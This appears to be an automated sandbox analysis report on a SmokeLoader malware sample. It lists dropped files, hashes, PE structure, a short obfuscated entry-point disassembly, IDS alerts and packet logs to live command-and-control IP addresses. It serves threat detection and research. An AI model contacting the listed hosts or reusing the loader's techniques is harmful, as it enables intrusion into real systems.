                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):24598
                                                                                                                                    Entropy (8bit):7.987495493200845
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:LU6A2OCYMfVKirkrym2d2Ft5n0IKqGFrXS5iLvQyZ2ZLo1SrDriIrlngLVX:LwrCd9krvR3KqGJiKQyUBo6eIr6x
                                                                                                                                    MD5:C9D97269A33C6769582C81D880F78A1C
                                                                                                                                    SHA1:E3C04DAD51E127ADA2F833A2220594D2B34C572C
                                                                                                                                    SHA-256:E8C29C666618EF4C7F2406883E0AA06597CC794B304073B555E1520016FAC8E6
                                                                                                                                    SHA-512:B6DE144CB010FC3A400B04C5A976A97BE3D6C1D99FF24C30BDC0E00EE8F77D8C5D6DBC0449651DF3A3342C79566FE1BAB26A67968B90F3EAD7323947145AB1ED
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.qp.PA30a.s......^.......#.......O>..A{.{l.....................W^..,............**..."..............;....../...................'../............Y..._\...[.U.LU.a.......U.U.=%.....o....~z.......).y.....|..y.....|..y.....|..?.8?.3.....H|.............H....`^.....{..._y..W......!..._..J._y......... b.N.....ox..........b..........R.o .`...(.r.a....+.@...I.K4.^...Y9.Z..Vx.WS..B.`..b!...*.h.l.....z.tz.......;./`=.k......$...............2....Y.8......*.C....4Z...%...C...A.......(t..P..;4|.&.....sSpn.......'`...ny. ..H,2Q..v.b...q..>.b.y.y.y .6.P..;....;..........?..........+.<.l.5..5oH.P....~..v....C(....J..h@.R...p...4.@../..J....... q.9?......../...W.B];..`.o....L.....0L.?0....|(...@B..../E.H..P. .......NA....A.............'A.$`...B`?..c.#@"..1.c...p0g......V.2..W.........L4.0p@..o..1.s..T..p:..pH..!.G..C=%.%....Q.+..3..(...@.g.......4...*......w......v7...yx87.<.n...<\d.-......7.7.......Ps.s........]l......?<<.H8.....[..o....qsa..qh........g......@.8r.......7

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):10752
                                                                                                                                    Entropy (8bit):4.917119327447698
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Qkk3BzHgYRJzJpb+4EzOxauEcWZyWwrW:azHfRJ1pb+4EzOxaDZyWwrW
                                                                                                                                    MD5:1097D1E58872F3CF58F78730A697CE4B
                                                                                                                                    SHA1:96DB4E4763A957B28DD80EC1E43EB27367869B86
                                                                                                                                    SHA-256:83EC0BE293B19D00ECA4AE51F16621753E1D2B11248786B25A1ABAAE6230BDEF
                                                                                                                                    SHA-512:B933EAC4EAABACC51069A72B24B649B980AEA251B1B87270FF4FFEA12DE9368D5447CDBE748AC7FAF2805548B896C8499F9ECEEED2F5EFD0C684F94360940351
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.(.D.{.D.{.D.{.<0{.D.{./.z.D.{./.z.D.{.D.{.D.{./.z.D.{./.z.D.{./.z.D.{./.z.D.{./\{.D.{./.z.D.{Rich.D.{........PE..L.....}...........!.........................0...............................p.......+....@A........................@$......|@.......P..8....................`..........T...........................`................@..x............................text............................... ..`.data...\....0......................@....idata..v....@......................@..@.rsrc...8....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):36864
                                                                                                                                    Entropy (8bit):5.153561346833534
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:C/gOUmKmcVYF82y+hnVeM1LrB0ZqWF6WZT+vBoYd:C/Am0GLKZJ4po
                                                                                                                                    MD5:D09724C29A8F321F2F9C552DE6EF6AFA
                                                                                                                                    SHA1:D6CE3D3A973695F4F770E7FB3FCB5E2F3DF592A3
                                                                                                                                    SHA-256:23CC82878957683184FBD0E3098E9E6858978BF78D7812C6D7470EBDC79D1C5C
                                                                                                                                    SHA-512:CC8DB1B0C4BBD94DFC8A669CD6ACCF6FA29DC1034CE03D9DAE53D6CE117BB86B432BF040FB53230B612C6E9A325E58ACC8EBB600F760A8D9D6A383CE751FD6ED
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K......K..H...K..O...K...J..K..J...K..K...K..C...K.....K..I...K.Rich..K.........PE..L..................!.....t...........x...............................................*....@A........................P...n...8........................................s..T............................%..................4............................text....s.......t.................. ..`.data...\............x..............@....idata...............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):412160
                                                                                                                                    Entropy (8bit):6.440111636589855
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:Zb4spB+uPpnV5dH+V15pyYy8W/czcJauE:Zb4sB+uPpnVHH+hpyYydczcJY
                                                                                                                                    MD5:02557C141C9E153C2B7987B79A3A2DD7
                                                                                                                                    SHA1:A054761382EE68608B6A3B62B68138DC205F576B
                                                                                                                                    SHA-256:207C587E769E2655669BD3CE1D28A00BCAC08F023013735F026F65C0E3BAA6F4
                                                                                                                                    SHA-512:A37E29C115BCB9956B1F8FD2022F2E3966C1FA2A0EFA5C2EE2D14BC5C41BFDDAE0DEEA4D481A681D13EC58E9DEC41E7565F8B4EB1C10F2C44C03E58BDD2792B3
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A4u..U...U...U...-..OU...>...U...>...U...U...T...>...U...>...U...>...U...>..<U...>...U...>...U..Rich.U..........................PE..L....Q.=...........!................pJ....................................................@A................................T....................................l...%..T...............................................P............................text............................... ..`.data...............................@....idata..Z...........................@..@.didat..............................@....rsrc...............................@..@.reloc...l.......n..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\f\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):7030
                                                                                                                                    Entropy (8bit):7.958266788621544
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:81ruwbXGT3mZCmm98yKuTOROSR3PdcGy7GeLc9y:ruXCH9DKcOROSR3kcY
                                                                                                                                    MD5:69B49B3DF8D7FA7A1588EF18B258AE44
                                                                                                                                    SHA1:9C33EA299609D07CEFDF684D38A4C3BFD6D33B0D
                                                                                                                                    SHA-256:CCC3FDDDA0894FAEB7745E81E9C1357A51CD9AEEF7326C54A26A1CD5AC5348DE
                                                                                                                                    SHA-512:31DD915EF296FDFEE70C5684F78B44C2B83CAD21C50A87ACCE6BD4FB31F1DC57F0500D7D6B9F45F437E13F824EA9D7A521CBDB0429C63F19F35D25C557E79756
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:fWU.PA30..s......^..?...(......U|....<+y...:-...............8...Y..,............*....*...=........++. ........?..'.........#......n5bQDC3CcUnn.....^.dUaDcFUD4...^..nn....;.Q0.b...C.._.hR*..M.../P.....iH..r..=....N\.T..Q0(.......2....................e...&0.b ```8...a`.....8..@..A'/p.=+..Ld"...D&..KJCd.......n..qnP.q@.2.h..H`...B.#v......\.Ld".........A............G.(.....((.g..*.!3R.....p........![...0...L@...N^(..._...h...@."C..<......00*.......Ce.....O~..\...l.[...m..I...o%.15.k.o.......r]....f.W.....*..*..u.NK......].*.....t...0...*..Hj..M.?h2Hw.Z^-.ml..U76MGu...n7.AkP...`..H...N..T.T......Q(R.Y..(..A0X.p.(...f...nV..7+....v...r+7n.j.f...$......DZ.Z.u.6s.Yk....&gV...Ve.6....N....&kr5.Y.k.r.".q..|V...ZC....Y.....#.$g0.. .1$lf5.....C..t:.....9.j.\..(.k....P:.m.;...l.^.......Y.........Z.........{......j...N.]U..|.)w.{?..%g.M...2...=B....d...K.`..r..b...vv...o.i.#.0.o......sv3..q.n...d.4....n@.. 1H.. 1.H..4v;@.*.$LOa..+H....U`3$>..@F..a0...C.B

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\r\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6648
                                                                                                                                    Entropy (8bit):7.956463646454614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:zABbqVw9iWzZ91e1dkT9wMK+LcUYtW+/cipvUUMCMtuf/ORkphTbqn1z3a7J+mBe:6y7Wl91eEwMK+RY9k4yCSu+o5+siDF9
                                                                                                                                    MD5:D547F124FF89733FE1D641C7D99F0573
                                                                                                                                    SHA1:923143A6BB4CDEEEE35A1F3931FA08FBAF4046CD
                                                                                                                                    SHA-256:56587C58E4012F958C2D9A4BA566ACFE701C0E3D988FC171F6AC9D5AEA23AE1F
                                                                                                                                    SHA-512:12767430FDFDFDDDA5DE896B534AC0CD8A95BB0CD4D72DAE53A3ECBE3E8AF7A2D2DDFF0FCBD94416DF11DE644B3ED1C5725661F2DF00905951569E63361DE286
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:...qPA30........^..?............UX..M.C...[.................(]..,............*....*...=.........+. ....................................U....W<.:U..I.....[.....M9.yp.. .>.7...o86F.[8)*.....3p.J ...s{.b+.jA... l....3|.....>.;`..v`.v.A....5]0.?...v f;..i..)....>.......;d @.....%..xPn......G?..~.1.[.j(...C..q.S|..4>.0oP..oh=tDa...`...ie..Gop..G.E.d#!...C.....+..>.`._ q..?j.B=.!. )0D.{..X.B.((f.......Y...i...E....8....@.%....=.2"...(0..:.........*.....4.........f.._.....):.O-.A?H,.!7.b!....>...Xt.X.....[......}.b!..F.c!.........7........u9Dk...i...&'c.k.T.@..v...]...........!...."..$........@@....1I. ...p.....a...@.."..i[X,,#....,..ns.....;s7..;.t.n....=\......dJ...8...2 ..E.....n...==s.......<..n.n....T..]....ps.".1.p.8L.a$(..l..\..#.}.F...!.S)t.;F.;.O..d..U..L...L....\.3...y...2e.\..x....g.e>..2..P..L...=./b2.S..U.i&.2]....{..B(.0..O!HS.N.h.C..A.1..S7w.!.f..7e..n7*.&......vS.uv..@\.....u...v..H......q..5.Z.;...DNT......H..."D..h.H+.G...(i........&...;..h.

                                                                                                                                    C:\Users\user\AppData\Roaming\hfetwhc

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):37888
                                                                                                                                    Entropy (8bit):6.997703329544817
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:MgRyFAxrpRAf/KP46VjlOPBktlTVlPavMTVp:M3KxVRAf/lAjuBcTVlPavMp
                                                                                                                                    MD5:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    SHA1:EDB0A9379263C6A0A12DD77DF7D2ABE373A24722
                                                                                                                                    SHA-256:4793C4F1D490D454D761F7947B6451C07FBBC8639013F5C80B3F493E7C6CB6EB
                                                                                                                                    SHA-512:90CE292592E600B53D1E97E2CDF751D7390B246A70AA9C8051745B8029CD1DB22443D2A12307691F2EDC1573ABB6F9887D2E281853232E0C239B069889523737
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\hfetwhc, Author: Joe Security
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                    Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......f...............I............T2............@.................................J................................................................................................................................................................text............................... ....................................................................................................;.......9.R=&....=.o.%.)..-et-x.S.*..b>..S]..:.."....f.[.XUBo~~t..T.?.>.....'...B.~.....".@+..w)TK;.q..d..};........R.>.M.,.a)....r.AZ.e,.]W.T...f"....O'V..#.+.. . ..;.O.........K....8.xT..3....5>..ev..%..~zsl.....&3~.:q8.........w....p.r.ytP[G.......#..1z349.Y.v.........t.M.Qh....otRG.^P>R.....S.]..=6L.O..bMy.....^...Dv...t...c..9..u4B..n.U}a..hz..}.f..AP.].K....zP....C..'..O.`.eN*..nd.4....?.p..."t..p....M..+..g..a..].....A..HU../.4?H..,k.'..&@&...._*f

                                                                                                                                    C:\Users\user\AppData\Roaming\hfetwhc:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Users\user\AppData\Roaming\hshstfj

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):365216
                                                                                                                                    Entropy (8bit):7.999418216424842
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:6144:o97kCenaPxVOtG3zkZyT9jmcvE43ZAOTsIHYxm5nkwnvjfqqoRPn6IQWO7/f6zmN:odkvaPxAG3zkZ6xt84y0XHYxmVvzin6T
                                                                                                                                    MD5:328D7847146DA01756460C35A2CABB19
                                                                                                                                    SHA1:9FE1840EFB2E5EA205B593E3EC9B7159ECB12A08
                                                                                                                                    SHA-256:5F3A37FBEBB5ECB6BED1D9D222C6F6D58F5C5B09DC624DC0B571A7DDEFE8B02E
                                                                                                                                    SHA-512:861CC926E4D032001C7D45022F8BD780CCCA1DB68487B9596C02E34EBD43E72F2FD5622A0AFD7C05BA491399EDF8654E406C52976F3EBA8D0D635B0294001DEE
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:...W.I{1(Pg...lx......!...4..O....G...w.f{....V....?.F..o.............3tU^7..h.6lmX.6...'..O..]..h"z,....q.f.s).N.LP...q...."qM.S^_.].E.9.t[..1..........N.[......9...Y...Y.[.....(F.v...C.~x./iMX..M.9.H@m9...3.>.c..Yy..q..f.......4:..P.2..r3-....'<.....zr.u.EK..2..t.jw.]...,.j..<..C..O..eXJ.7K.E#...cu..$....y....D..V...J...... W.Z..z..;qa>.J.r....13..Pw"j...).Qh..(.g.....@X.........E.....z...c.Em.E\...rU......L...D.E;..x8W.D.y...4r)r\.'..[.y..veT..........W.......Q)he.$...LAd....v$...'..F..V.@..>...?...m..3.....F.v..^jV.h...J]...D=.LW..w...`..WVM.k.`...q..(Y....X.Gx\.7.~...3o..+nn..A..W..a..+....8..x.].^....v.ZZa....m..YT|0.gr+....k....S.....Q.....Aw.._..x.....V.....7...p.T...X..8q..I.F...{..`."..V..4.Jk.......b.)W.L.~|...h<MT...6+.....z.Y#..8=*..'.1.............c.....OA....9+...F.#7.W4v.?Sft)..).r...w<.f..D.{..R4.u...q..Q#...C.Kq#5).*.Z?...A.......{XxEU=....^.....`.S..'(._9...E).".e..Z.|nV...P6.W;.&.y...,..Y#3.u....[

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):6.997703329544817
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • VXD Driver (31/22) 0.00%
                                                                                                                                    File name:172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5:8e177d78ae583957804b5a933d6a3f1e
                                                                                                                                    SHA1:edb0a9379263c6a0a12dd77df7d2abe373a24722
                                                                                                                                    SHA256:4793c4f1d490d454d761f7947b6451c07fbbc8639013f5c80b3f493e7c6cb6eb
                                                                                                                                    SHA512:90ce292592e600b53d1e97e2cdf751d7390b246a70aa9c8051745b8029cd1db22443d2a12307691f2edc1573abb6f9887d2e281853232e0c239b069889523737
                                                                                                                                    SSDEEP:768:MgRyFAxrpRAf/KP46VjlOPBktlTVlPavMTVp:M3KxVRAf/lAjuBcTVlPavMp
                                                                                                                                    TLSH:E103D085BF90C0ADFF340AB712C5A5E19313BAEA088AE54DCB356D3B38A1D49245B49C
                                                                                                                                    File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......f...............I............T2............@.................................J......................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x403254
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:
                                                                                                                                    Time Stamp:0x66ED9F87 [Fri Sep 20 16:15:03 2024 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:1
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:1
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:1
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    call 00007FF701228EE5h
                                                                                                                                    jne 00007FF701228EE8h
                                                                                                                                    je 00007FF701228EE6h
                                                                                                                                    pop edi
                                                                                                                                    mov edx, EB5BB25Ch
                                                                                                                                    or cl, al
                                                                                                                                    sub ebx, 00003259h
                                                                                                                                    jmp 00007FF701228EE7h
                                                                                                                                    mov ch, bl
                                                                                                                                    cmc
                                                                                                                                    enter 748Ah, 08h
                                                                                                                                    jne 00007FF701228EE8h
                                                                                                                                    mov byte ptr [esi+eax*8-41h], cl
                                                                                                                                    push eax
                                                                                                                                    xchg eax, edx
                                                                                                                                    push 00000030h
                                                                                                                                    jne 00007FF701228EE7h
                                                                                                                                    je 00007FF701228EE5h
                                                                                                                                    xor bh, byte ptr [ecx-22h]
                                                                                                                                    mov edx, dword ptr [esp]
                                                                                                                                    add esp, 04h
                                                                                                                                    jmp 00007FF701228EE8h
                                                                                                                                    add al, 29h
                                                                                                                                    shr bl, 00000005h
                                                                                                                                    and ch, bl
                                                                                                                                    stc
                                                                                                                                    add al, 22h
                                                                                                                                    jmp 00007FF701228EE7h
                                                                                                                                    or byte ptr [edx], ch
                                                                                                                                    or al, 72h
                                                                                                                                    jecxz 00007FF701228F46h
                                                                                                                                    add eax, dword ptr [edx]
                                                                                                                                    je 00007FF701228EE7h
                                                                                                                                    jne 00007FF701228EE5h
                                                                                                                                    pop ebx
                                                                                                                                    push esp
                                                                                                                                    and al, FFh
                                                                                                                                    mov al, A4h
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [ebp+04h], dh
                                                                                                                                    je 00007FF701228EE4h
                                                                                                                                    popfd

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x91940x9200918930a2d38bb1ceb8f83a1f60c1f784False0.771564640410959data7.0440254923492915IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849742198.54.117.24280TCP
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849730194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849738194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849714194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849718198.54.117.24280TCP
                                                                                                                                    2024-10-06T21:26:02.042526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849747194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:27:36.683173+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849734198.54.117.24280TCP
                                                                                                                                    2024-10-06T21:27:37.689520+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849746194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:27:37.879552+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)2194.87.189.8780192.168.2.849746TCP
                                                                                                                                    2024-10-06T21:28:16.092832+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849748194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:28:56.074082+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849749194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:29:11.964748+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849750194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:29:30.230373+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849751194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:29:49.168031+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849752194.87.189.8780TCP
                                                                                                                                    2024-10-06T21:30:06.043036+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849753194.87.189.8780TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 6, 2024 21:26:30.206715107 CEST4971480192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.211478949 CEST8049714194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.211853981 CEST4971480192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.211853981 CEST4971480192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.211853981 CEST4971480192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.216645956 CEST8049714194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.216753960 CEST8049714194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.216866016 CEST8049714194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.220467091 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.220493078 CEST44349715194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.220693111 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.221026897 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.221044064 CEST44349715194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.242089987 CEST44349715194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.242296934 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.242296934 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.242795944 CEST49716443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.242842913 CEST44349716194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.242923975 CEST49716443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.243357897 CEST49716443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.243377924 CEST44349716194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.263519049 CEST44349716194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.263633013 CEST49716443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.263700962 CEST49716443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.263720036 CEST44349716194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.264183998 CEST49717443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.264215946 CEST44349717194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.268971920 CEST49717443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.269850016 CEST49717443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.269870043 CEST44349717194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.270111084 CEST49717443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.537875891 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.542923927 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.543009996 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST4971880192.168.2.8198.54.117.242
